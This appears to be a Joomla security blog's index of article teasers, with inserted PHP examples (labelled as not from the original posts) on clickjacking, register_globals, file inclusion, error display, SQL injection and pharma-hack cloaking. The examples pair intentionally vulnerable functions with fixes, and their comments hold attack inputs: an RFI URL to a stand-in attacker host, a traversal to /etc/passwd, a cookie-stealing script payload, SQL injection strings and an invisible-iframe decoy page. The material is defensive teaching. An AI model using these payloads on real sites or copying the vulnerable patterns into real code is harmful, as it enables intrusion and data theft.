security

  • There are numerous other tactics that can be used to break into a computer system, and these usually involve discovering weaknesses or loopholes in the server software's defenses. When programmers write software that runs on a web server, they try to make sure that the software cannot be abused, but it can be very difficult to foresee every eventuality; vandals and hackers are always pushing software to the limit and trying out operations which the software was not designed to handle, in an attempt to discover a way in.

  • It's one of the best-kept "secrets" of Joomla 2.5+: there is a built-in password strength meter, ready to be used. Some are selling plugins for good money, and others offer free ones, to let you unleash this hidden power.

    But if you aren't afraid to get your hands dirty with some PHP code, here is how you can do it:

  • As I write this, both Joomla 1.5 and 2.5 reached their EOL (End Of Life) a long time ago, and are not developed or supported anymore. This is a huge security risk, so the best advice here is to upgrade your Joomla site to the latest version. But what if you don't have the time/funds to do it right now?

  • Clickjacking is a browser-level attack that works across a wide range of browsers and platforms. The attacker loads the target site into an invisible layer (typically a transparent frame) laid over a decoy page, so a click that appears to press one button is actually delivered to a control on the hidden site; the user's clicks are hijacked. The unsuspecting user thus performs actions they never intended, from apparently harmless ones, such as following someone on Twitter, to really nasty ones, such as changing a password or submitting credit card details, and anything else you might (not want to) do on a web page.
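
    The overlay described above and the headers that defeat it, as an added example that is not code from the original post. "victim.example", "partner.example" and the plugin name "noframe" are placeholders; the plugin skeleton assumes the Joomla 2.5/3.x plugin API.

```php
<?php
// Added example, not code from the original post. It shows the shape of a
// clickjacking page and the response headers that make browsers refuse to
// frame a site. "victim.example", "partner.example" and the plugin name
// "noframe" are placeholders.

// 1. The attacker's decoy page: the target site sits in a transparent iframe
//    stacked above a harmless-looking button, so the user's click lands on the
//    framed page (here a profile-edit form) instead of on the button.
$decoyPage = <<<'HTML'
<!doctype html>
<style>
  #bait  { position:absolute; top:120px; left:80px; z-index:1; }
  #frame { position:absolute; top:0; left:0; width:800px; height:600px;
           opacity:0; z-index:2; border:0; }   /* invisible, but on top */
</style>
<button id="bait">Click here to claim your prize</button>
<iframe id="frame"
  src="https://victim.example/index.php?option=com_users&view=profile&layout=edit"></iframe>
HTML;

// 2. The defence. X-Frame-Options is understood by every browser from roughly
//    2010 on; Content-Security-Policy frame-ancestors is its successor and can
//    name specific origins. Sending both covers old and new browsers.
function framingProtectionHeaders(array $allowedAncestors = array('self'))
{
    // The legacy header can only express "nobody" or "same origin".
    $xfo = ($allowedAncestors === array('none')) ? 'DENY' : 'SAMEORIGIN';
    $sources = array();
    foreach ($allowedAncestors as $src) {
        $sources[] = in_array($src, array('self', 'none'), true) ? "'$src'" : $src;
    }
    return array(
        'X-Frame-Options'         => $xfo,
        'Content-Security-Policy' => 'frame-ancestors ' . implode(' ', $sources),
    );
}

function sendFramingProtectionHeaders(array $allowedAncestors = array('self'))
{
    foreach (framingProtectionHeaders($allowedAncestors) as $name => $value) {
        header($name . ': ' . $value);   // must run before any output
    }
}

// 3. Where to call it in Joomla: a system plugin fires before the page is
//    rendered. File: plugins/system/noframe/noframe.php (manifest not shown).
if (class_exists('JPlugin')) {
    class PlgSystemNoframe extends JPlugin
    {
        public function onAfterInitialise()
        {
            // Only the site itself may frame pages; add e.g. 'https://partner.example'
            // if a trusted site legitimately embeds you.
            sendFramingProtectionHeaders(array('self'));
        }
    }
}
```

    Note that Joomla's own Wrapper component frames external pages, not the other way round, so SAMEORIGIN does not interfere with it. If the site is meant to be embedded by a partner, list that origin in the CSP header rather than removing the protection altogether.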

  • While working on a new site I discovered that reCaptcha, which used to be a rock-solid part of the CMS since Joomla 1.7, stopped working. I spent a couple of hours googling around and checking and double-checking settings, just to discover that Google, in its infinite wisdom, has changed things again without notice. The problem affects all Joomla versions from 1.7.1 to 3.2.0.

  • Many of you have probably already seen the red warning in Joomla's admin interface that Register Globals is set to "on" and needs to be switched "off", otherwise your site is exposed to security threats.

    And also many of you have no clue how to do it...

    So, let's see what an average webmaster can do about this problem.
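
    What the setting does to a script, and one way to neutralise it when the host gives you no php.ini access, as an added example (not the article's own code). The "authorized" variable, the sensitive include path and the use of auto_prepend_file are assumptions for illustration.

```php
<?php
// Added example, not the article's own code. It shows why register_globals
// is dangerous and a way to neutralise it when you cannot change php.ini.
// register_globals only exists up to PHP 5.3; it was removed in PHP 5.4.

function isAuthenticated()
{
    return false;   // stand-in for a real login check
}

// 1. The classic hole (intentionally vulnerable). With register_globals=On,
//    ?authorized=1 in the URL pre-sets the global $authorized before this
//    function runs, so the final test passes for anyone who knows the name.
function sensitiveDataAllowed()
{
    if (isAuthenticated()) {
        $GLOBALS['authorized'] = true;   // meant to be the only place it is set...
    }
    return !empty($GLOBALS['authorized']);   // ...but the request may have set it already
}

// 2. The setting is PHP_INI_PERDIR: ini_set() cannot change it at runtime. The
//    real fix is php.ini, or on Apache with mod_php a line in .htaccess:
//        php_flag register_globals off
//    This check tells you whether that has taken effect.
function registerGlobalsIsOn()
{
    $v = strtolower(trim((string) ini_get('register_globals')));
    return $v !== '' && $v !== '0' && $v !== 'off' && $v !== 'false';
}

// 3. Fallback when the host allows neither: undo the registration before any
//    other code runs (load this file via auto_prepend_file, or as the very
//    first include). Superglobals themselves must never be unset.
//    Returns the number of request-derived globals removed.
function unregisterGlobals()
{
    if (!registerGlobalsIsOn()) {
        return 0;
    }
    $protected = array('GLOBALS', '_GET', '_POST', '_COOKIE', '_REQUEST',
                       '_SERVER', '_ENV', '_FILES', '_SESSION');
    $removed = 0;
    foreach (array($_GET, $_POST, $_COOKIE, $_REQUEST, $_SERVER, $_ENV, $_FILES) as $input) {
        foreach (array_keys($input) as $key) {
            if (!in_array($key, $protected, true) && array_key_exists($key, $GLOBALS)) {
                unset($GLOBALS[$key]);
                $removed++;
            }
        }
    }
    return $removed;
}

unregisterGlobals();   // in the real prepend file this is the first statement
```

    The .htaccess line only works when PHP runs as an Apache module; under CGI/FastCGI the directive belongs in a php.ini (or .user.ini on PHP 5.3+) in the site root, and the host may have locked it. Run the check after changing anything: the warning in Joomla's admin interface will disappear once ini_get() reports the setting as off.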

  • Remote File Inclusion (RFI) is a type of vulnerability most often found in web applications. It allows an attacker to make a script on the web server include, and execute, a file hosted on a server the attacker controls. Its sibling, Local File Inclusion (LFI), is the same technique pointed at files that already exist on the target server, either system files such as logs, or files the attacker managed to plant earlier, after a successful break-in.
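
    The hole and its fix side by side, as an added example (not the article's code). The "pages/" directory, the page names and the sample attack strings are constructed for illustration.

```php
<?php
// Added example, not the article's code: a file-inclusion hole in a PHP page
// and its hardened form. "pages/" and the page names are made up.

// Vulnerable: the page name from the URL is used as part of a path.
//   ?page=http://evil.example/shell     -> RFI, if allow_url_include is On
//   ?page=../../../../etc/passwd%00     -> LFI, null byte cuts off ".php" (PHP < 5.3.4)
//   ?page=../../logs/error              -> LFI of a log the attacker seeded with PHP code
function vulnerablePage($page)
{
    include $page . '.php';
}

// Hardened: the request only selects from a fixed map; no user input ever
// reaches the filesystem. Returns the file chosen, or null when rejected.
function safePage($page)
{
    static $allowed = array(
        'home'    => 'home.php',
        'contact' => 'contact.php',
    );
    if (!is_string($page) || !isset($allowed[$page])) {
        return null;
    }
    $file = dirname(__FILE__) . '/pages/' . $allowed[$page];
    if (is_file($file)) {
        include $file;
    }
    return $file;
}

// Server-side belt and braces: the settings that turn an LFI into an RFI.
// Returns a list of warnings (empty means nothing to complain about).
function includeSettingsWarnings()
{
    $warn = array();
    if (filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN)) {
        $warn[] = 'allow_url_include is On: include() can load remote URLs';
    }
    if (filter_var(ini_get('allow_url_fopen'), FILTER_VALIDATE_BOOLEAN)) {
        $warn[] = 'allow_url_fopen is On: only needed if the site really fetches remote files';
    }
    if (trim((string) ini_get('open_basedir')) === '') {
        $warn[] = 'open_basedir is not set: a traversal can read the whole filesystem';
    }
    return $warn;
}
```

    Sanitising the value with basename() or stripping "../" is not a substitute for the allowlist: encodings and wrapper schemes (php://, data:) keep finding ways round string filters, while a lookup table has nothing to bypass.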

  • Joomla has everything you may need. Right? If you take a look at the Joomla Extensions site, you may agree with this. But, as always, there may be cases where the above statement is wrong. For a specific need the simplest approach may be a standalone script. You can solve the problem, apparently, by using Joomla's wrapper feature and using your scripts as if they were part of your Joomla site. An almost perfect solution, you may think... but your scripts remain directly accessible at their physical URL, not only through the Joomla interface. What can you do about it?

    A lot. And surprisingly easily.
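
    One way to do it, as an added example and not necessarily the method the article goes on to describe: the standalone script bootstraps the Joomla framework itself and refuses to run for anyone who is not logged in. Because the wrapper's iframe is served from the same host, the browser sends the Joomla session cookie along with the request, so the script sees the same user Joomla sees. The path scripts/report.php and the group IDs are assumptions; the bootstrap lines are the commonly used pattern for loading Joomla 2.5/3.x from an external script.

```php
<?php
// Added example, not the article's own code. Assumed location:
// <joomla root>/scripts/report.php, displayed through the Wrapper component.
// The bootstrap below is the usual way to load Joomla 2.5/3.x from an
// external script; for 1.5 the same lines work but $user->gid replaces
// getAuthorisedGroups().

define('_JEXEC', 1);
define('JPATH_BASE', dirname(dirname(__FILE__)));      // one level below the Joomla root
require_once JPATH_BASE . '/includes/defines.php';
require_once JPATH_BASE . '/includes/framework.php';

$app = JFactory::getApplication('site');
$app->initialise();                                   // session and language are now available

$user = JFactory::getUser();

// 1. Anonymous visitors (including anyone typing the physical URL) are refused.
if ($user->guest) {
    header('HTTP/1.1 403 Forbidden');
    exit('Please log in to the site first.');
}

// 2. Optionally restrict to specific groups. IDs come from Users > Groups;
//    8 is Super Users in a default 2.5/3.x install (assumption for this example).
$allowedGroups = array(8);
if (!array_intersect($allowedGroups, $user->getAuthorisedGroups())) {
    header('HTTP/1.1 403 Forbidden');
    exit('You are not allowed to use this tool.');
}

// 3. From here on, the script's own work. Output is still escaped: the user's
//    display name is user-controlled data like any other.
echo 'Report for ' . htmlspecialchars($user->name, ENT_QUOTES, 'UTF-8');
```

    Loading the framework costs a few tens of milliseconds per request, which is acceptable for a tool page. If the script also has to be reachable by the public, the same check can instead be applied only to the parts that should not be, but the gate has to live in the script itself: a link hidden behind a Joomla menu item protects nothing.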

  • Joomla specifies certain settings that are recommended for proper functioning of the system. A list of the recommended and actual settings is displayed when you install Joomla. One of the recommended settings is to have 'Display Errors' switched off. Having it on is very useful when developing and debugging a site, but there is a security vulnerability in PHP (not Joomla, but the language in which Joomla was written) which may allow cross-site-scripting attacks when the display errors option is enabled, if you have a script which produces an error that echoes user-supplied input.
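
    How an error message turns into a reflection point, and the settings that keep errors out of the browser, as an added example that is not the article's code. The templates/ directory, the log path and the sample payload are assumptions.

```php
<?php
// Added example, not the article's code. Shows how a PHP warning can carry
// attacker input back into the page, and the settings that stop errors from
// reaching the browser. The log path is an assumption.

// Intentionally vulnerable: when the include fails, PHP's warning repeats the
// path it was given, i.e. whatever came in on the URL. With display_errors=On
// that text is printed into the HTML, and depending on PHP version and the
// html_errors setting it may land there unescaped:
//   ?tpl=<script>alert(document.cookie)</script>
function renderTemplate($tpl)
{
    include 'templates/' . $tpl . '.php';
}

// Is anything going to the browser? 'stderr' is treated as off (CLI only).
function displayErrorsIsOn()
{
    $v = strtolower(trim((string) ini_get('display_errors')));
    return !in_array($v, array('', '0', 'off', 'false', 'no', 'stderr'), true);
}

// Production settings. These are PHP_INI_ALL, so they work from ini_set()
// even on shared hosting; in .htaccess (Apache + mod_php) the equivalent is
//   php_flag display_errors off
//   php_flag log_errors on
//   php_value error_log /path/outside/webroot/php_errors.log
// Returns true when, after applying them, nothing is displayed any more.
function applyProductionErrorSettings($logFile)
{
    ini_set('display_errors', '0');
    ini_set('log_errors', '1');
    ini_set('error_log', $logFile);
    // Any error that still reaches a handler is logged with its details and
    // swallowed, so PHP's own message text never becomes page output.
    set_error_handler(function ($errno, $errstr, $errfile, $errline) {
        error_log("[$errno] $errstr in $errfile:$errline");
        return true;   // suppress PHP's default output
    });
    return !displayErrorsIsOn();
}

applyProductionErrorSettings(dirname(__FILE__) . '/../logs/php_errors.log');
```

    The log file must sit outside the web root, or it becomes the next thing an attacker reads (or, through an LFI, includes). Joomla's own Global Configuration > Server > Error Reporting only changes error_reporting; it does not override a display_errors that the server has switched on.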

  • Joomla, like most CMSs, excels at making it easy to manage a website. It offers a pretty easy way to handle web-based publishing, format management, history editing and version control, indexing, search, and retrieval. Joomla has an impressive suite of features, but these features require some special considerations.

  • One popular and potentially devastating method of attack against Joomla-powered sites is SQL injection. Any web application that makes use of a database usually talks to it using a special language known as Structured Query Language, or SQL, and an attacker who can smuggle SQL fragments into those queries through unchecked input can read or alter data he was never meant to touch. Joomla, by the way, uses MySQL, an open source database that speaks this language.
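
    An injectable Joomla query beside the same lookup written with the framework's quoting, as an added example that is not the article's code. It assumes the Joomla 2.5/3.x database API (JFactory::getDbo(), getQuery(true), quote(), quoteName()) and the standard #__content table; the alias parameter and the sample payloads are constructed.

```php
<?php
// Added example, not the article's code: an injectable query against the Joomla
// content table beside the same lookup written with the Joomla 2.5/3.x database
// API. Assumes the Joomla framework is loaded (JFactory available); the alias
// value comes from a request parameter.

defined('_JEXEC') or die;

// Vulnerable: the request value is pasted into the SQL text.
//   ?alias=x' OR '1'='1          -> returns every row
//   ?alias=x' UNION SELECT ...   -> reads other tables (users, sessions)
function findByAliasUnsafe($alias)
{
    $db = JFactory::getDbo();
    $db->setQuery("SELECT id, title FROM #__content WHERE alias = '" . $alias . "'");
    return $db->loadObjectList();
}

// Hardened: numbers are cast, text goes through $db->quote() (which escapes and
// wraps in quotes), identifiers through $db->quoteName(). The query builder does
// not protect you by itself; the quoting calls do.
function findByAliasSafe($alias)
{
    $db    = JFactory::getDbo();
    $query = $db->getQuery(true)
        ->select($db->quoteName('id') . ', ' . $db->quoteName('title'))
        ->from($db->quoteName('#__content'))
        ->where($db->quoteName('alias') . ' = ' . $db->quote($alias))
        ->where($db->quoteName('state') . ' = 1');
    $db->setQuery($query);
    return $db->loadObjectList();
}

function findByIdSafe($id)
{
    $db    = JFactory::getDbo();
    $query = $db->getQuery(true)
        ->select('*')
        ->from($db->quoteName('#__content'))
        ->where($db->quoteName('id') . ' = ' . (int) $id);   // cast: nothing but digits survives
    $db->setQuery($query);
    return $db->loadObject();
}

// Typical call. Reading the parameter through the request layer (JRequest in
// 1.5/2.5, $app->input in 3.x) filters the type; quoting on the way into SQL
// is still required.
$alias = JRequest::getString('alias', '');
$rows  = findByAliasSafe($alias);
```

    The same rule applies to ORDER BY columns and LIMIT values, which cannot be quoted as strings: validate them against a list of permitted column names or cast them to integers before they touch the query.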

  • The most comprehensive analysis of trends in website security is finally out. There are a couple of interesting facts worth highlighting.

    Most important is something we expected: Joomla is emerging as the most secure CMS.

  • The Pharma Hack (or Blackhat SEO Spam Hack) is a very elaborate hack which often goes unnoticed by regular visitors, and by website owners, because it uses an ingenious trick: it presents a different version of your site to the search engine bots. For a long period of time the site looks and behaves normally for regular visitors. This attack is very interesting because it is not visible to the normal user; the spam (generally about Viagra, Nexium, Cialis, etc.) only shows up if the user agent is Google's crawler (Googlebot). Also, the infection is a bit tricky to remove and, if not done properly, will keep reappearing. It's one of the nastiest hacks you might have. We recommend hiring a specialist to remove it, because generally the infection reappears in no time after the site is "cleaned".
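
    A quick way to test your own site for this kind of cloaking, as an added example that is not the article's code: fetch the same page once as a normal browser and once claiming to be Googlebot, then compare. The URL, the user-agent strings and the spam keyword list are assumptions for illustration.

```php
<?php
// Added example, not the article's code: a cloaking check for a site you own.
// The pharma hack serves spam only to search engine crawlers, so fetch the
// same URL as a browser and as Googlebot and compare the two responses.
// Run from the command line:  php cloak-check.php https://your-site.example/
// (URL, user-agent strings and keyword list are assumptions for illustration.)

function fetchAs($url, $userAgent)
{
    $ctx = stream_context_create(array('http' => array(
        'method'          => 'GET',
        'header'          => "User-Agent: $userAgent\r\n",
        'ignore_errors'   => true,   // keep the body even on 4xx/5xx
        'follow_location' => 1,
        'timeout'         => 15,
    )));
    $body = @file_get_contents($url, false, $ctx);
    return $body === false ? '' : $body;
}

// Count occurrences of each keyword in the visible text (tags stripped,
// case-insensitive). Returns keyword => count for keywords that were found.
function spamHits($html, array $keywords)
{
    $text = strtolower(strip_tags($html));
    $hits = array();
    foreach ($keywords as $kw) {
        $n = substr_count($text, strtolower($kw));
        if ($n > 0) {
            $hits[$kw] = $n;
        }
    }
    return $hits;
}

function cloakingReport($url)
{
    $browserUA = 'Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0';
    $googleUA  = 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)';
    $keywords  = array('viagra', 'cialis', 'nexium', 'levitra', 'pharmacy');

    $asBrowser = fetchAs($url, $browserUA);
    $asGoogle  = fetchAs($url, $googleUA);

    return array(
        'size_browser' => strlen($asBrowser),
        'size_google'  => strlen($asGoogle),
        'spam_browser' => spamHits($asBrowser, $keywords),
        'spam_google'  => spamHits($asGoogle, $keywords),
        // Identical responses prove nothing by themselves (some variants key
        // on the crawler's IP range or on a search-engine referrer instead),
        // but a different body, or spam hits only in the Googlebot copy, is a
        // strong signal that something is cloaking.
        'differs'      => $asBrowser !== $asGoogle,
    );
}

if (PHP_SAPI === 'cli' && isset($argv[1])) {
    print_r(cloakingReport($argv[1]));
}
```

    A complementary server-side check is to grep the site's PHP files for code that branches on HTTP_USER_AGENT containing "googlebot"; legitimate Joomla code has no reason to do that, so any hit deserves a close look. Google's own cached copy of the page (or the "Fetch as Google" tool in Webmaster Tools) shows you what the crawler was served.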

  • Also known as two-step authentication or two-step verification, two-factor authentication is an additional security option for online accounts to help keep them safe.

  • The WYSIWYG editors are great additions to Joomla, and we have lots of them around. They turn a casual user into a webmaster and can speed up the work of pros. But sometimes you find that you cannot enter text into the HTML editor, or click on the HTML editor's toolbar buttons: you are locked out of editing your own content!

    What can be more annoying than being unable to edit your own site?

  • By default, across all Joomla versions from Joomla 1.0 through Joomla 1.5 and Joomla 1.6 to Joomla 1.7, the basic structure of the default user groups is unchanged. Users are generally sorted into 3 main categories: unregistered (not logged in) users, registered users with frontend-only access, and backend users. The exact naming of these main groups varies across Joomla versions, but the default end-level groups are the same. The groups and their core permissions are as follows:

  • Websites take maintenance, and making a habit of performing a little spring cleaning each year can keep a business website running smoothly. The tips below do not apply to Joomla sites alone; any site can benefit from most of these tricks and tips.

  • Even most security-conscious Joomla webmasters don't know of the existence of this list, maintained on the Joomla docs site. It lists all components with known security problems, and, very important to know, items that once appeared on the list are not removed when the problem is fixed, because the large majority of Joomla webmasters don't upgrade their add-ons as new versions come out. So it is worth checking: even if the components you use are listed in GREEN, aka fixed, you may run into trouble, because hackers know the list too and are proactively seeking Joomla sites using the insecure add-ons. So you can easily become a target even if you have the secure version...

    Bookmark this link!

    Vulnerable extensions list

  • A client of mine asked this question: "How can I allow registered users to log in and see the site even in offline mode, without giving them Super user privileges?"

  • After moving a site to a new server I found this error in the backend: at least one error per page, but occasionally even more.

    XML Parsing Error at. Error

    No error number, no line number... What the heck!